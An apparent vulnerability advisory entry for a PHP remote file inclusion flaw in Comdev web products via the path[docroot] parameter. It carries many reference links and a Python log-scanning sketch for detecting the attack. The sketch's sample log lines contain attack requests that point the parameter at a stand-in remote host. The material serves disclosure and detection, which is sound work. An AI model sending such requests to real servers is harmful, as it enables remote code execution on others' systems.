PHP remote file inclusion vulnerability in include.php in Comdev CSV Importer 3.1 and possibly 4.1, as used in (1) Comdev Contact Form 3.1, (2) Comdev Customer Helpdesk 3.1, (3) Comdev Events Calendar 3.1, (4) Comdev FAQ Support 3.1, (5) Comdev Guestbook 3.1, (6) Comdev Links Directory 3.1, (7) Comdev News Publisher 3.1, (8) Comdev Newsletter 3.1, (9) Comdev Photo Gallery 3.1, (10) Comdev Vote Caster 3.1, (11) Comdev Web Blogger 3.1, and (12) Comdev eCommerce 3.1, allows remote attackers to execute arbitrary PHP code via a URL in the path[docroot] parameter. NOTE: it has been reported that 4.1 versions might also be affected.
secunia.com/advisories/22133
secunia.com/advisories/22134
secunia.com/advisories/22135
secunia.com/advisories/22147
secunia.com/advisories/22149
secunia.com/advisories/22151
secunia.com/advisories/22153
secunia.com/advisories/22154
secunia.com/advisories/22157
secunia.com/advisories/22168
secunia.com/advisories/22169
secunia.com/advisories/22170
securityreason.com/securityalert/1658
www.osvdb.org/29299
www.osvdb.org/29300
www.osvdb.org/29301
www.osvdb.org/29302
www.osvdb.org/29303
www.osvdb.org/29304
www.osvdb.org/29305
www.osvdb.org/29306
www.osvdb.org/29307
www.osvdb.org/29308
www.osvdb.org/29309
www.osvdb.org/29310
www.osvdb.org/29311
www.securityfocus.com/archive/1/447184/100/0/threaded
www.securityfocus.com/archive/1/447185/100/0/threaded
www.securityfocus.com/archive/1/447186/100/0/threaded
www.securityfocus.com/archive/1/447187/100/0/threaded
www.securityfocus.com/archive/1/447188/100/0/threaded
www.securityfocus.com/archive/1/447190/100/0/threaded
www.securityfocus.com/archive/1/447192/100/0/threaded
www.securityfocus.com/archive/1/447193/100/0/threaded
www.securityfocus.com/archive/1/447194/100/0/threaded
www.securityfocus.com/archive/1/447201/100/0/threaded
www.securityfocus.com/archive/1/447207/100/0/threaded
www.securityfocus.com/archive/1/447209/100/0/threaded
www.securityfocus.com/archive/1/447213/100/0/threaded
www.vupen.com/english/advisories/2006/3803
www.vupen.com/english/advisories/2006/3804
www.vupen.com/english/advisories/2006/3805
www.vupen.com/english/advisories/2006/3806
www.vupen.com/english/advisories/2006/3807
www.vupen.com/english/advisories/2006/3808
www.vupen.com/english/advisories/2006/3809
www.vupen.com/english/advisories/2006/3810
www.vupen.com/english/advisories/2006/3811
www.vupen.com/english/advisories/2006/3812
www.vupen.com/english/advisories/2006/3813
www.vupen.com/english/advisories/2006/3814
www.vupen.com/english/advisories/2006/3815
exchange.xforce.ibmcloud.com/vulnerabilities/29220
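
Detection sketch for the pattern described above: a request to include.php whose path[docroot] parameter carries a URL instead of a local path. This is an added example, not code from the advisory or from Comdev. It assumes Apache combined-format access logs; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# A value that begins with "scheme://", i.e. a URL rather than a local path.
URL_RE = re.compile(r'^\s*[a-z][a-z0-9+.-]*://', re.I)
PARAM = "path[docroot]"   # parameter named in the advisory
SCRIPT = "include.php"    # script named in the advisory


def suspicious_value(target):
    """Return the path[docroot] value if the request target matches the pattern."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/" + SCRIPT):
        return None
    # parse_qsl percent-decodes names and values, so path%5Bdocroot%5D matches too.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() == PARAM and URL_RE.match(value):
            return value
    return None


def scan(lines):
    """Yield (client_ip, value) for each log line that matches."""
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        value = suspicious_value(m.group("target"))
        if value is not None:
            yield line.split(" ", 1)[0], value


# Constructed sample log lines (documentation addresses and hosts only).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Oct/2006:10:00:00 +0000] "GET /helpdesk/include.php?path[docroot]=http://host.example/a.txt HTTP/1.1" 200 512 "-" "-"',
    '192.0.2.11 - - [01/Oct/2006:10:00:05 +0000] "GET /gallery/include.php?path%5Bdocroot%5D=FTP%3A%2F%2Fhost.example%2Fa HTTP/1.0" 200 512 "-" "-"',
    '198.51.100.7 - - [01/Oct/2006:10:01:00 +0000] "GET /gallery/include.php?path[docroot]=/var/www/gallery/ HTTP/1.1" 200 900 "-" "-"',
    '198.51.100.8 - - [01/Oct/2006:10:02:00 +0000] "GET /index.php?page=http://host.example/ HTTP/1.1" 200 900 "-" "-"',
]

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"possible RFI attempt from {ip}: path[docroot]={value}")
```

A 200 response on a matching line only shows the request was served, not that the include succeeded; correlate with outbound connections from the web server before drawing conclusions.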